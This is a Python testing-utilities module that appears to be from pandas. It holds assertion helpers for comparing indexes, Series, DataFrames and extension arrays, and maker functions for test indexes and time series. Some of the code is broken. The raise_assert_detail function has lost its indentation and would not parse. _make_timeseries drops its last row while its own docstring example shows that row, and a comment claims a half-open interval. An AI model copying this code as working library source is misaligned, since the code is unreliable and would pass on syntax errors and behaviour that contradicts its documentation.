            diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
            msg = f"{obj} values are different ({np.round(diff, 5)} %)"
            raise_assert_detail(obj, msg, left, right)
    else:
        # approximate comparison with the requested precision
        _testing.assert_almost_equal(
            left.values,
            right.values,
            check_less_precise=check_less_precise,
            check_dtype=exact,
            obj=obj,
            lobj=left,
            robj=right,
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("names", left, right, obj=obj)
    if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
        assert_attr_equal("freq", left, right, obj=obj)
    if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
        assert_interval_array_equal(left.values, right.values)
    if check_categorical:
        if is_categorical_dtype(left) or is_categorical_dtype(right):
            assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
    """
    Assert that *left* and *right* are instances of the same class.

    With ``exact="equiv"``, Int64Index and RangeIndex are treated as
    interchangeable; with ``exact=False`` no check is performed.
    """
    __tracebackhide__ = True

    def repr_class(x):
        if isinstance(x, Index):
            # show the Index itself so its values appear in the message
            return x
        try:
            return type(x).__name__
        except AttributeError:
            return repr(type(x))

    if exact == "equiv":
        if type(left) != type(right):
            # allow equivalence of Int64Index/RangeIndex
            names = {type(left).__name__, type(right).__name__}
            if names - {"Int64Index", "RangeIndex"}:
                msg = f"{obj} classes are not equivalent"
                raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
    elif exact:
        if type(left) != type(right):
            msg = f"{obj} classes are different"
            raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
    """Checks attributes are equal. Both objects must have attribute.

    Parameters
    ----------
    attr : str
        Attribute name being compared.
    left : object
    right : object
    obj : str, default 'Attributes'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    __tracebackhide__ = True
    left_attr = getattr(left, attr)
    right_attr = getattr(right, attr)
    # identity fast-path (also handles None, shared singletons)
    if left_attr is right_attr:
        return True
    # two NaNs compare unequal but are considered matching attributes
    if (
        is_number(left_attr)
        and np.isnan(left_attr)
        and is_number(right_attr)
        and np.isnan(right_attr)
    ):
        return True
    try:
        result = left_attr == right_attr
    except TypeError:
        # datetimetz on rhs may raise TypeError
        result = False
    if not isinstance(result, bool):
        # array-like comparison result: require every element equal
        result = result.all()
    if result:
        return True
    msg = f'Attribute "{attr}" are different'
    raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
    """
    Assert that *objs* is a valid return value from a plotting call:
    either an ndarray/Series whose elements are matplotlib Axes (or dicts),
    or a single Artist, tuple, or dict.
    """
    # imported lazily so this module does not require matplotlib at import time
    import matplotlib.pyplot as plt
    if isinstance(objs, (pd.Series, np.ndarray)):
        for el in objs.ravel():
            msg = (
                "one of 'objs' is not a matplotlib Axes instance, "
                f"type encountered {repr(type(el).__name__)}"
            )
            assert isinstance(el, (plt.Axes, dict)), msg
    else:
        # BUG FIX: message previously read "ArtistArtist" (duplicated word)
        msg = (
            "objs is neither an ndarray of Artist instances nor a single "
            "Artist instance, tuple, or dict, 'objs' is a "
            f"{repr(type(objs).__name__)}"
        )
        assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
    """Return True if *obj* defines ``__iter__``.

    Note: sequences supporting iteration only via ``__getitem__``
    return False here.
    """
    return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
    """Assert that the sequence is sorted (ascending)."""
    if isinstance(seq, (Index, Series)):
        # compare on the underlying ndarray
        seq = seq.values
    # sorting does not change precisions
    assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
    left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
    """Test that Categoricals are equivalent.

    Parameters
    ----------
    left : Categorical
    right : Categorical
    check_dtype : bool, default True
        Check that integer dtype of the codes are the same
    check_category_order : bool, default True
        Whether the order of the categories should be compared, which
        implies identical integer codes. If False, only the resulting
        values are compared. The ordered attribute is
        checked regardless.
    obj : str, default 'Categorical'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, Categorical)
    if check_category_order:
        # strict: same categories in the same order, same codes
        assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
        assert_numpy_array_equal(
            left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
        )
    else:
        # lenient: same category set and same realized values, order ignored
        assert_index_equal(
            left.categories.sort_values(),
            right.categories.sort_values(),
            obj=f"{obj}.categories",
        )
        assert_index_equal(
            left.categories.take(left.codes),
            right.categories.take(right.codes),
            obj=f"{obj}.values",
        )
    # `ordered` must match in either mode
    assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
    """Test that two IntervalArrays are equivalent.

    Parameters
    ----------
    left, right : IntervalArray
        The IntervalArrays to compare.
    exact : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical. If 'equiv', then RangeIndex can be substituted for
        Int64Index as well.
    obj : str, default 'IntervalArray'
        Specify object name being compared, internally used to show appropriate
        assertion message
    """
    _check_isinstance(left, right, IntervalArray)
    assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
    # BUG FIX: the right endpoints were previously labelled "{obj}.left",
    # producing a misleading assertion message on failure.
    assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.right")
    assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
    """Assert that two PeriodArrays have identical ordinals and freq."""
    _check_isinstance(left, right, PeriodArray)
    # _data holds the integer ordinals backing the PeriodArray
    assert_numpy_array_equal(left._data, right._data, obj=f"{obj}.values")
    assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
    """Assert that two DatetimeArrays have identical values, freq and tz."""
    __tracebackhide__ = True
    _check_isinstance(left, right, DatetimeArray)
    # _data holds the underlying datetime64 ndarray
    assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
    assert_attr_equal("freq", left, right, obj=obj)
    assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
    """Assert that two TimedeltaArrays have identical values and freq."""
    __tracebackhide__ = True
    _check_isinstance(left, right, TimedeltaArray)
    # _data holds the underlying timedelta64 ndarray
    assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
    assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
    left,
    right,
    strict_nan=False,
    check_dtype=True,
    err_msg=None,
    check_same=None,
    obj="numpy array",
):
    """
    Check that 'np.ndarray' is equivalent.

    Parameters
    ----------
    left, right : numpy.ndarray or iterable
        The two arrays to be compared.
    strict_nan : bool, default False
        If True, consider NaN and None to be different.
    check_dtype : bool, default True
        Check dtype if both a and b are np.ndarray.
    err_msg : str, default None
        If provided, used as assertion message.
    check_same : None|'copy'|'same', default None
        Ensure left and right refer/do not refer to the same memory area.
    obj : str, default 'numpy array'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    __tracebackhide__ = True
    # instance validation
    # Show a detailed error message when classes are different
    assert_class_equal(left, right, obj=obj)
    # both classes must be an np.ndarray
    _check_isinstance(left, right, np.ndarray)
    # For views, compare identity of the owning base buffer.
    def _get_base(obj):
        return obj.base if getattr(obj, "base", None) is not None else obj
    left_base = _get_base(left)
    right_base = _get_base(right)
    if check_same == "same":
        if left_base is not right_base:
            raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
    elif check_same == "copy":
        if left_base is right_base:
            raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
    # Build and raise the failure message; when err_msg is None a
    # shape/percentage-difference message is synthesized instead.
    def _raise(left, right, err_msg):
        if err_msg is None:
            if left.shape != right.shape:
                raise_assert_detail(
                    obj, f"{obj} shapes are different", left.shape, right.shape,
                )
            diff = 0
            for l, r in zip(left, right):
                # count up differences
                if not array_equivalent(l, r, strict_nan=strict_nan):
                    diff += 1
            diff = diff * 100.0 / left.size
            msg = f"{obj} values are different ({np.round(diff, 5)} %)"
            raise_assert_detail(obj, msg, left, right)
        # only reached when err_msg was provided by the caller
        raise AssertionError(err_msg)
    # compare shape and values
    if not array_equivalent(left, right, strict_nan=strict_nan):
        _raise(left, right, err_msg)
    if check_dtype:
        if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
            assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
    left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
    """Check that left and right ExtensionArrays are equal.

    Parameters
    ----------
    left, right : ExtensionArray
        The two arrays to compare
    check_dtype : bool, default True
        Whether to check if the ExtensionArray dtypes are identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
    check_exact : bool, default False
        Whether to compare number exactly.

    Notes
    -----
    Missing values are checked separately from valid values.
    A mask of missing values is computed for each and checked to match.
    The remaining all-valid values are cast to object dtype and checked.
    """
    assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
    assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
    if check_dtype:
        assert_attr_equal("dtype", left, right, obj="ExtensionArray")
    if hasattr(left, "asi8") and type(right) == type(left):
        # Avoid slow object-dtype comparisons: datetime-like arrays expose
        # their int64 representation via asi8
        assert_numpy_array_equal(left.asi8, right.asi8)
        return
    # compare NA masks first, then only the valid positions
    left_na = np.asarray(left.isna())
    right_na = np.asarray(right.isna())
    assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
    left_valid = np.asarray(left[~left_na].astype(object))
    right_valid = np.asarray(right[~right_na].astype(object))
    if check_exact:
        assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
    else:
        _testing.assert_almost_equal(
            left_valid,
            right_valid,
            check_dtype=check_dtype,
            check_less_precise=check_less_precise,
            obj="ExtensionArray",
        )
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_series_type=True,
    check_less_precise=False,
    check_names=True,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    obj="Series",
):
    """
    Check that left and right Series are equal.

    Parameters
    ----------
    left : Series
    right : Series
    check_dtype : bool, default True
        Whether to check the Series dtype is identical.
    check_index_type : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_series_type : bool, default True
        Whether to check the Series class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    check_names : bool, default True
        Whether to check the Series and Index names attribute.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    obj : str, default 'Series'
        Specify object name being compared, internally used to show appropriate
        assertion message.
    """
    __tracebackhide__ = True
    # instance validation
    _check_isinstance(left, right, Series)
    if check_series_type:
        # ToDo: There are some tests using rhs is sparse
        # lhs is dense. Should use assert_class_equal in future
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # length comparison
    if len(left) != len(right):
        msg1 = f"{len(left)}, {left.index}"
        msg2 = f"{len(right)}, {right.index}"
        raise_assert_detail(obj, "Series length are different", msg1, msg2)
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj=f"{obj}.index",
    )
    if check_dtype:
        # We want to skip exact dtype checking when `check_categorical`
        # is False. We'll still raise if only one is a `Categorical`,
        # regardless of `check_categorical`
        if (
            is_categorical_dtype(left)
            and is_categorical_dtype(right)
            and not check_categorical
        ):
            pass
        else:
            assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
    # value comparison: dispatch on the requested strictness and the dtypes
    if check_exact:
        assert_numpy_array_equal(
            left._internal_get_values(),
            right._internal_get_values(),
            check_dtype=check_dtype,
            obj=str(obj),
        )
    elif check_datetimelike_compat:
        # we want to check only if we have compat dtypes
        # e.g. integer and M|m are NOT compat, but we can simply check
        # the values in that case
        if needs_i8_conversion(left) or needs_i8_conversion(right):
            # datetimelike may have different objects (e.g. datetime.datetime
            # vs Timestamp) but will compare equal
            if not Index(left.values).equals(Index(right.values)):
                msg = (
                    f"[datetimelike_compat=True] {left.values} "
                    f"is not equal to {right.values}."
                )
                raise AssertionError(msg)
        else:
            assert_numpy_array_equal(
                left._internal_get_values(),
                right._internal_get_values(),
                check_dtype=check_dtype,
            )
    elif is_interval_dtype(left) or is_interval_dtype(right):
        assert_interval_array_equal(left.array, right.array)
    elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
        # .values is an ndarray, but ._values is the ExtensionArray.
        # TODO: Use .array
        assert is_extension_array_dtype(right.dtype)
        assert_extension_array_equal(left._values, right._values)
    elif (
        is_extension_array_dtype(left)
        and not is_categorical_dtype(left)
        and is_extension_array_dtype(right)
        and not is_categorical_dtype(right)
    ):
        assert_extension_array_equal(left.array, right.array)
    else:
        # default: approximate numeric comparison
        _testing.assert_almost_equal(
            left._internal_get_values(),
            right._internal_get_values(),
            check_less_precise=check_less_precise,
            check_dtype=check_dtype,
            obj=str(obj),
        )
    # metadata comparison
    if check_names:
        assert_attr_equal("name", left, right, obj=obj)
    if check_categorical:
        if is_categorical_dtype(left) or is_categorical_dtype(right):
            assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
    left,
    right,
    check_dtype=True,
    check_index_type="equiv",
    check_column_type="equiv",
    check_frame_type=True,
    check_less_precise=False,
    check_names=True,
    by_blocks=False,
    check_exact=False,
    check_datetimelike_compat=False,
    check_categorical=True,
    check_like=False,
    obj="DataFrame",
):
    """
    Check that left and right DataFrame are equal.

    This function is intended to compare two DataFrames and output any
    differences. Is is mostly intended for use in unit tests.
    Additional parameters allow varying the strictness of the
    equality checks performed.

    Parameters
    ----------
    left : DataFrame
        First DataFrame to compare.
    right : DataFrame
        Second DataFrame to compare.
    check_dtype : bool, default True
        Whether to check the DataFrame dtype is identical.
    check_index_type : bool or {'equiv'}, default 'equiv'
        Whether to check the Index class, dtype and inferred_type
        are identical.
    check_column_type : bool or {'equiv'}, default 'equiv'
        Whether to check the columns class, dtype and inferred_type
        are identical. Is passed as the ``exact`` argument of
        :func:`assert_index_equal`.
    check_frame_type : bool, default True
        Whether to check the DataFrame class is identical.
    check_less_precise : bool or int, default False
        Specify comparison precision. Only used when check_exact is False.
        5 digits (False) or 3 digits (True) after decimal points are compared.
        If int, then specify the digits to compare.
        When comparing two numbers, if the first number has magnitude less
        than 1e-5, we compare the two numbers directly and check whether
        they are equivalent within the specified precision. Otherwise, we
        compare the **ratio** of the second number to the first number and
        check whether it is equivalent to 1 within the specified precision.
    check_names : bool, default True
        Whether to check that the `names` attribute for both the `index`
        and `column` attributes of the DataFrame is identical.
    by_blocks : bool, default False
        Specify how to compare internal data. If False, compare by columns.
        If True, compare by blocks.
    check_exact : bool, default False
        Whether to compare number exactly.
    check_datetimelike_compat : bool, default False
        Compare datetime-like which is comparable ignoring dtype.
    check_categorical : bool, default True
        Whether to compare internal Categorical exactly.
    check_like : bool, default False
        If True, ignore the order of index & columns.
        Note: index labels must match their respective rows
        (same as in columns) - same labels must be with the same data.
    obj : str, default 'DataFrame'
        Specify object name being compared, internally used to show appropriate
        assertion message.

    See Also
    --------
    assert_series_equal : Equivalent method for asserting Series equality.
    DataFrame.equals : Check DataFrame equality.

    Examples
    --------
    This example shows comparing two DataFrames that are equal
    but with columns of differing dtypes.
    >>> from pandas._testing import assert_frame_equal
    >>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
    >>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
    df1 equals itself.
    >>> assert_frame_equal(df1, df1)
    df1 differs from df2 as column 'b' is of a different type.
    >>> assert_frame_equal(df1, df2)
    Traceback (most recent call last):
    ...
    AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
    Attribute "dtype" are different
    [left]: int64
    [right]: float64
    Ignore differing dtypes in columns with check_dtype.
    >>> assert_frame_equal(df1, df2, check_dtype=False)
    """
    __tracebackhide__ = True
    # instance validation
    _check_isinstance(left, right, DataFrame)
    if check_frame_type:
        assert isinstance(left, type(right))
        # assert_class_equal(left, right, obj=obj)
    # shape comparison
    if left.shape != right.shape:
        raise_assert_detail(
            obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
        )
    if check_like:
        # align left to right's index/column order before comparing
        left, right = left.reindex_like(right), right
    # index comparison
    assert_index_equal(
        left.index,
        right.index,
        exact=check_index_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj=f"{obj}.index",
    )
    # column comparison
    assert_index_equal(
        left.columns,
        right.columns,
        exact=check_column_type,
        check_names=check_names,
        check_less_precise=check_less_precise,
        check_exact=check_exact,
        check_categorical=check_categorical,
        obj=f"{obj}.columns",
    )
    # compare by blocks
    if by_blocks:
        rblocks = right._to_dict_of_blocks()
        lblocks = left._to_dict_of_blocks()
        # both frames must have the same set of block dtypes
        for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
            assert dtype in lblocks
            assert dtype in rblocks
            assert_frame_equal(
                lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
            )
    # compare by columns
    else:
        for i, col in enumerate(left.columns):
            assert col in right
            # positional access keeps duplicate column labels distinct
            lcol = left.iloc[:, i]
            rcol = right.iloc[:, i]
            assert_series_equal(
                lcol,
                rcol,
                check_dtype=check_dtype,
                check_index_type=check_index_type,
                check_less_precise=check_less_precise,
                check_exact=check_exact,
                check_names=check_names,
                check_datetimelike_compat=check_datetimelike_compat,
                check_categorical=check_categorical,
                obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
            )
def assert_equal(left, right, **kwargs):
    """
    Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.

    Parameters
    ----------
    left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
        The two items to be compared.
    **kwargs
        All keyword arguments are passed through to the underlying assert method.

    Raises
    ------
    NotImplementedError
        If ``left`` is of a type with no registered comparator.
    """
    __tracebackhide__ = True
    # NOTE: order matters -- the concrete array subclasses (PeriodArray,
    # DatetimeArray, TimedeltaArray) must be tested before ExtensionArray.
    if isinstance(left, pd.Index):
        assert_index_equal(left, right, **kwargs)
    elif isinstance(left, pd.Series):
        assert_series_equal(left, right, **kwargs)
    elif isinstance(left, pd.DataFrame):
        assert_frame_equal(left, right, **kwargs)
    elif isinstance(left, IntervalArray):
        assert_interval_array_equal(left, right, **kwargs)
    elif isinstance(left, PeriodArray):
        assert_period_array_equal(left, right, **kwargs)
    elif isinstance(left, DatetimeArray):
        assert_datetime_array_equal(left, right, **kwargs)
    elif isinstance(left, TimedeltaArray):
        assert_timedelta_array_equal(left, right, **kwargs)
    elif isinstance(left, ExtensionArray):
        assert_extension_array_equal(left, right, **kwargs)
    elif isinstance(left, np.ndarray):
        assert_numpy_array_equal(left, right, **kwargs)
    elif isinstance(left, str):
        # plain equality for strings; no kwargs apply
        assert kwargs == {}
        assert left == right
    else:
        raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
    """
    Helper function to wrap the expected output of a test in a given box_class.

    Parameters
    ----------
    expected : np.ndarray, Index, Series
    box_cls : {Index, Series, DataFrame}
    transpose : bool, default True
        If boxing into a DataFrame, transpose to a single row (see below).

    Returns
    -------
    subclass of box_cls

    Raises
    ------
    NotImplementedError
        If ``box_cls`` is not one of the supported box types.
    """
    if box_cls is pd.Index:
        expected = pd.Index(expected)
    elif box_cls is pd.Series:
        expected = pd.Series(expected)
    elif box_cls is pd.DataFrame:
        expected = pd.Series(expected).to_frame()
        if transpose:
            # for vector operations, we need a DataFrame to be a single-row,
            # not a single-column, in order to operate against non-DataFrame
            # vectors of the same length.
            expected = expected.T
    elif box_cls is PeriodArray:
        # the PeriodArray constructor is not as flexible as period_array
        expected = period_array(expected)
    elif box_cls is DatetimeArray:
        expected = DatetimeArray(expected)
    elif box_cls is TimedeltaArray:
        expected = TimedeltaArray(expected)
    elif box_cls is np.ndarray:
        expected = np.array(expected)
    elif box_cls is to_array:
        # the function itself is used as a sentinel for "infer the array type"
        expected = to_array(expected)
    else:
        raise NotImplementedError(box_cls)
    return expected
def to_array(obj):
    """Convert *obj* to the ExtensionArray matching its inferred dtype,
    falling back to a plain ndarray for everything else."""
    # temporary implementation until we get pd.array in place
    if is_period_dtype(obj):
        return period_array(obj)
    elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
        return DatetimeArray._from_sequence(obj)
    elif is_timedelta64_dtype(obj):
        return TimedeltaArray._from_sequence(obj)
    else:
        return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
    left,
    right,
    check_dtype=True,
    check_kind=True,
    check_fill_value=True,
    consolidate_block_indices=False,
):
    """Check that the left and right SparseArray are equal.

    Parameters
    ----------
    left : SparseArray
    right : SparseArray
    check_dtype : bool, default True
        Whether to check the data dtype is identical.
    check_kind : bool, default True
        Whether to just the kind of the sparse index for each column.
    check_fill_value : bool, default True
        Whether to check that left.fill_value matches right.fill_value
    consolidate_block_indices : bool, default False
        Whether to consolidate contiguous blocks for sparse arrays with
        a BlockIndex. Some operations, e.g. concat, will end up with
        block indices that could be consolidated. Setting this to true will
        create a new BlockIndex for that array, with consolidated
        block indices.
    """
    _check_isinstance(left, right, pd.arrays.SparseArray)
    # compare only the stored (non-fill) values first
    assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
    # SparseIndex comparison
    assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
    assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
    if not check_kind:
        # normalize both to BlockIndex so int/block kinds compare equal
        left_index = left.sp_index.to_block_index()
        right_index = right.sp_index.to_block_index()
    else:
        left_index = left.sp_index
        right_index = right.sp_index
    if consolidate_block_indices and left.kind == "block":
        # we'll probably remove this hack...
        left_index = left_index.to_int_index().to_block_index()
        right_index = right_index.to_int_index().to_block_index()
    if not left_index.equals(right_index):
        raise_assert_detail(
            "SparseArray.index", "index are not equal", left_index, right_index
        )
    else:
        # indices matched; nothing further to check here
        pass
    if check_fill_value:
        assert_attr_equal("fill_value", left, right)
    if check_dtype:
        assert_attr_equal("dtype", left, right)
    # finally compare the fully densified values
    assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
    """Assert that every element of *iterable* is contained in *dic*."""
    for item in iterable:
        assert item in dic, f"Did not contain item: {repr(item)}"
def assert_copy(iter1, iter2, **eql_kwargs):
    """
    iter1, iter2: iterables that produce elements
    comparable with assert_almost_equal

    Checks that the elements are equal, but not
    the same object. (Does not check that items
    in sequences are also not the same object)
    """
    for elem1, elem2 in zip(iter1, iter2):
        assert_almost_equal(elem1, elem2, **eql_kwargs)
        msg = (
            f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
            "different objects, but they were the same object."
        )
        # equal-but-distinct: identity must differ even though values match
        assert elem1 is not elem2, msg
def getCols(k):
    """Return the first *k* uppercase ASCII letters as one string."""
    uppercase = string.ascii_uppercase
    return uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
    """Return a length-k Index of random 10-char ASCII strings."""
    return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
    """Return a length-k Index of random 10-char non-ASCII unicode strings."""
    return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
    """ make a length k CategoricalIndex with n categories """
    # categories are random 4-char strings; codes cycle 0..n-1 across k entries
    x = rands_array(nchars=4, size=n)
    return CategoricalIndex(
        Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
    )
def makeIntervalIndex(k=10, name=None, **kwargs):
    """ make a length k IntervalIndex with breaks evenly spaced on [0, 100] """
    breaks = np.linspace(0, 100, num=(k + 1))
    return IntervalIndex.from_breaks(breaks, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
    """Return a length-k boolean Index: [True] for k==1, otherwise
    [False, True] followed by False padding."""
    if k == 1:
        return Index([True], name=name)
    if k == 2:
        return Index([False, True], name=name)
    values = [False, True] + [False] * (k - 2)
    return Index(values, name=name)
def makeIntIndex(k=10, name=None):
    """Return an integer Index containing 0..k-1."""
    values = list(range(k))
    return Index(values, name=name)
def makeUIntIndex(k=10, name=None):
    """Return a length-k Index of values too large for int64: 2**63 + i."""
    base = 2 ** 63
    return Index([base + offset for offset in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
    """Return a RangeIndex covering [0, k) with step 1."""
    return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
    """Return a length-k float Index of sorted random values, shifted and
    scaled by a random power of ten."""
    # sorted uniforms minus a random offset (may produce negatives)
    values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
    return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
    """DatetimeIndex of k periods at `freq`, anchored at 2000-01-01."""
    anchor = datetime(2000, 1, 1)
    rng = bdate_range(anchor, periods=k, freq=freq, name=name)
    return DatetimeIndex(rng, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
    """TimedeltaIndex of k periods at `freq`, starting at one day."""
    return pd.timedelta_range(
        start="1 day", periods=k, freq=freq, name=name, **kwargs
    )
def makePeriodIndex(k=10, name=None, **kwargs):
    """PeriodIndex of k business-day periods starting near 2000-01-01."""
    first = datetime(2000, 1, 1)
    return pd.period_range(start=first, periods=k, freq="B", name=name, **kwargs)
def makeMultiIndex(k=10, names=None, **kwargs):
    # NOTE: `k` is ignored; the result is always the 4-entry product of
    # ("foo", "bar") x (1, 2).
    return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
# Pool of first names used for the "name" column of _make_timeseries.
_names = [
    "Alice",
    "Bob",
    "Charlie",
    "Dan",
    "Edith",
    "Frank",
    "George",
    "Hannah",
    "Ingrid",
    "Jerry",
    "Kevin",
    "Laura",
    "Michael",
    "Norbert",
    "Oliver",
    "Patricia",
    "Quinn",
    "Ray",
    "Sarah",
    "Tim",
    "Ursula",
    "Victor",
    "Wendy",
    "Xavier",
    "Yvonne",
    "Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
    """
    Make a DataFrame with a DatetimeIndex

    Parameters
    ----------
    start : str or Timestamp, default "2000-01-01"
        The start of the index. Passed to date_range with `freq`.
    end : str or Timestamp, default "2000-12-31"
        The end of the index. Passed to date_range with `freq`.
    freq : str or Freq
        The frequency to use for the DatetimeIndex
    seed : int, optional
        The random state seed.

    Returns
    -------
    DataFrame
        Indexed by "timestamp", with columns:

        * name : object dtype with string names
        * id : int dtype with
        * x, y : float dtype

    Examples
    --------
    >>> _make_timeseries()
                  id    name         x         y
    timestamp
    2000-01-01   982   Frank  0.031261  0.986727
    2000-01-02  1025   Edith -0.086358 -0.032920
    2000-01-03   982   Edith  0.473177  0.298654
    2000-01-04  1009   Sarah  0.534344 -0.750377
    2000-01-05   963   Zelda -0.271573  0.054424
    ...          ...     ...       ...       ...
    2000-12-27   980  Ingrid -0.132333 -0.422195
    2000-12-28   972   Frank -0.376007 -0.298687
    2000-12-29  1009  Ursula -0.865047 -0.503133
    2000-12-30  1000  Hannah -0.063757 -0.507336
    2000-12-31   972     Tim -0.869120  0.531685
    """
    index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
    n = len(index)
    state = np.random.RandomState(seed)
    columns = {
        "name": state.choice(_names, size=n),
        "id": state.poisson(1000, size=n),
        "x": state.rand(n) * 2 - 1,
        "y": state.rand(n) * 2 - 1,
    }
    df = pd.DataFrame(columns, index=index, columns=sorted(columns))
    # date_range includes `end`; drop the final row so the result covers
    # the half-open interval [start, end).
    if df.index[-1] == end:
        df = df.iloc[:-1]
    return df
def all_index_generator(k=10):
    """Generator which can be iterated over to get instances of all the various
    index classes.

    Parameters
    ----------
    k: length of each of the index instances
    """
    # One maker per concrete Index subclass exercised by the test suite.
    all_make_index_funcs = [
        makeIntIndex,
        makeFloatIndex,
        makeStringIndex,
        makeUnicodeIndex,
        makeDateIndex,
        makePeriodIndex,
        makeTimedeltaIndex,
        makeBoolIndex,
        makeRangeIndex,
        makeIntervalIndex,
        makeCategoricalIndex,
    ]
    for make_index_func in all_make_index_funcs:
        yield make_index_func(k=k)
def index_subclass_makers_generator():
